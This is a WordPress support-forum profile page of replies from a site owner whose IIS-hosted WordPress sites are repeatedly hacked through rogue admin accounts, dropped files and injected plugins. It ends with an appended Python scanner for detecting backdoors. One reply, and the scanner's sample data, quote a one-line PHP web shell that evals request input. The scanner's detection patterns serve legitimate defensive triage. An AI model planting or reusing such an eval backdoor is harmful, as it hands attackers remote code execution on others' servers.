salescart
Forum Replies Created
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPress
I already have comments deactivated in settings. The hackers were still adding comments. That’s why the people who originated the plugin originally created it because that feature as well is routinely hacked on WordPress. Like I said I have been doing this for a while and WordPress is the most hacked piece of software ever created. In fact, at my other job, the security team doesn’t allow WordPress anywhere in the agency. With the plugin the comment hacking stopped.
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPress
@asadullah96 How are they doing that?
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPress
I have taken a copy of the parent theme, SKT IT Consultant, and created a child theme. Only the smallest of changes to the style sheet to make it look different.
I use code snippets to:
- Completely Disable Comments Everywhere. Because that seems to be another hack in WordPress. Even when you have no “forum” in your website, people can somehow still make comments.
- Modify the header to add LivePerson support.
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPress
I have been hosting websites longer than WordPress has existed or that the WordPress domain has been registered. I started with FrontPage websites which were never hacked.
I’ve got like 4 WordPress websites on my servers. They are all hacked at will and have been since inception from Day 1 relentlessly through a generation of mySQL, PHP and Microsoft servers, and from virtually no plugins to 5 or 6 plugins. From tight permissions where you can’t even install a plugin or an update to recommended permissions. https://brudtkuhl.com/blog/wordpress-iis-permissions-updates-permalinks/ Mind you nothing else and no other websites have ever been hacked except when someone’s username was compromised or something obvious.
It doesn’t matter what I do. These are the current plugins:
- Ninja Forms: Ninja Forms is a webform builder with unparalleled ease of use and features. Version 3.10.1 | By Saturday Drive
- Simple Custom CSS: The simple, solid way to add custom CSS to your WordPress website. Simple Custom CSS allows you to add your own styles or override the default CSS of a plugin or theme. Version 4.0.7 | By John Regan
- Simple Disable XML-RPC: Simple Disable XML-RPC is a user-friendly WordPress plugin that empowers website administrators to easily control and secure their site by enabling or disabling the XML-RPC functionality. With a simple toggle switch, this plugin helps protect your WordPress site from potential XML-RPC-related security threats, enhancing your website's overall safety and performance. Version 1.3.5 | By WordPress Satkhira Community
- Wordfence Security: Wordfence Security - Anti-virus, Firewall and Malware Scan. Version 8.0.5 | By Wordfence
- WP Sitemap Page: Add a sitemap on any page/post using the simple shortcode [wp_sitemap_page]. Version 1.9.5 | By Tony Archambeau
- WPCode Lite: Easily add code snippets in WordPress. Insert scripts to the header and footer, add PHP code snippets with conditional logic, insert ads pixel, custom content, and more. Version 2.2.7 | By WPCode
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPress
I have been restoring from a clean backup EVERY time. The same backup from 2018. I have all the original content including the database backups from 2018. The site starts out clean but it is only a matter of time before it is hacked again. WordPress is very easy to hack. Not only did I start with a backup from 2018, but I deleted all of the WordPress and started with the latest version of WordPress. Then I added Wordfence and have run multiple scans including comprehensive scans where it compares files and replaces them. The Wordfence scan is clean. In fact, it is what notified me that someone simply added an admin account. This is an all-new install of MySQL as well, with all updated root username and password. They still walk right into this software like it is hackware.
- This reply was modified 10 months, 2 weeks ago by salescart.
Forum: Fixing WordPress
In reply to: Admin users created at will with WordPress
I’m running the Wordfence plug-in which verifies everything is cleaned up and repairs all files. I also deleted all of the WordPress extra folders and had them all reinstalled.
Forum: Fixing WordPress
In reply to: IIS Permissions that will result in no hacks
Thanks James. This isn’t answering my question. My question is what are the correct IIS permissions for WordPress?
Forum: Fixing WordPress
In reply to: Hacked over and over again
This is what I am seeing.
Someone has found a way to upload files which is the most bizarre thing….how can they do that?
The files have numbers and the contents have PHP content:
<?php @eval($_HEADERS["Sec-Websocket-Accept"]);@eval($_REQUEST["Sec-Websocket-Accept"]);
Also, they have changed the WP-Settings.php file…what mechanism allows them to do this?
Also, they have uploaded a wp-blog-header.php file which I don’t even believe was originally there. How do I permanently turn off all the blog capabilities. I thought I did already.
They are literally adding their own plugins:
0qn17s61
I had Wordfence installed but they blew that like it was a paper fence.
Forum: Fixing WordPress
In reply to: Hacked over and over again
All of these permissions with CHMOD describe Unix servers. I’m on a Windows server and IIS works completely differently with an IUSR account. I set all the permissions correctly towards that.
Also, I have tried multiple security plugins and none of them have worked for me. The rest of the regular websites never have any issues, only the WordPress websites…these should be read only. There must be advanced features like API-access or other things on. How do I completely turn off the WP-admin control panel completely?
Forum: Fixing WordPress
In reply to: Sites just keep getting hacked
Wordfence can scan every file for every extension and fix it…..and I’ve done that including adding a new vanilla update to WordPress and shutting permissions down and it made no difference. Hacked again.
Forum: Fixing WordPress
In reply to: Sites just keep getting hacked
Ok, that is helpful. Basically I want to restore the website, turn publishing off and make the website “read-only”.
Forum: Fixing WordPress
In reply to: WordPress Backdoor Protection
It is a BitNinja report (https://bitninja.com/) from my ISP flagging my IP that has the WordPress website on. I deleted and restored but someone seems to go back and re-hack it each time.
What is WordFence? Looking at it now.
Thanks for your reply.
- This reply was modified 3 years ago by salescart.
Forum: Fixing WordPress
In reply to: Virus attack being uploaded via WordPress
Eset NOD32 is the anti-virus.
If you have a recommendation for a Windows server, let me know.
All of the web sites are completely different. WordPress 5.9. PHP 5.6.
Forum: Fixing WordPress
In reply to: Virus attack being uploaded via WordPress
It is happening on multiple websites. The virus scanner is marking them as viruses. They basically are files like .13141915 with no first part of the file name. I haven’t opened the files because they are flagged by the virus scanner. They are everywhere but mainly on the root of the folder and the content/uploads folders.
How do I completely disable ALL UPLOADS and ALL discussion posting? I don’t even have any discussion forums going on yet I go to the Admin and people are posting spam discussions to a page that doesn’t even have a discussion on it.
This software is not very safe at all from exploits.
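This reply and the earlier "Hacked over and over again" reply describe the dropped files by name (digit-only names such as .13141915, in the site root and the uploads folder) and by content (eval() on request input). As an added example, not part of the original posts and not Wordfence or WordPress code, here is a read-only Python triage scan for both patterns; the reason labels, the four-digit minimum and the sample tree are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# eval() fed straight from request input, as in the file quoted in the post.
# $_HEADERS is not a PHP superglobal; it is matched because the quoted sample uses it.
EVAL_ON_INPUT = re.compile(rb"eval\s*\(\s*\$_(REQUEST|POST|GET|COOKIE|SERVER|HEADERS)\b", re.I)
# Digit-only names with an optional leading dot: ".13141915", "91827364.php".
NUMERIC_NAME = re.compile(r"^\.?\d{4,}(\.\w+)?$")
PHP_OPEN = re.compile(rb"<\?(php|=)", re.I)

def scan(root):
    """Return {relative_path: [reasons]} for files matching any heuristic."""
    root, findings = Path(root), {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root)
        try:
            with path.open("rb") as fh:
                data = fh.read(1 << 20)  # first 1 MiB is enough for these checks
        except OSError:
            continue  # locked or quarantined by AV: skip instead of aborting
        reasons = []
        if EVAL_ON_INPUT.search(data):
            reasons.append("eval-on-request-input")
        if NUMERIC_NAME.match(path.name):
            reasons.append("numeric-name")
        if "uploads" in (part.lower() for part in rel.parts[:-1]) and PHP_OPEN.search(data):
            reasons.append("php-in-uploads")
        if reasons:
            findings[rel.as_posix()] = reasons
    return findings

def demo():
    """Scan a constructed sample tree (file names and contents are made up)."""
    samples = {
        "index.php": b"<?php require __DIR__ . '/wp-blog-header.php';",
        ".13141915": b'<?php @eval($_REQUEST["Sec-Websocket-Accept"]);',
        "wp-content/uploads/2024/logo.png": b"\x89PNG constructed image bytes",
        "wp-content/uploads/2024/91827364.php": b"<?php echo 1;",
        "wp-content/plugins/0qn17s61/x.php": b'<?php @eval($_HEADERS["Sec-Websocket-Accept"]);',
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan(tmp)

if __name__ == "__main__":
    print(demo())
```

Calling scan() on a copy of the web root lists candidates for manual review; it only reads files and never deletes or repairs anything.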
Forum: Fixing WordPress
In reply to: Why are error message paths “cut off”?
Ok, got this one solved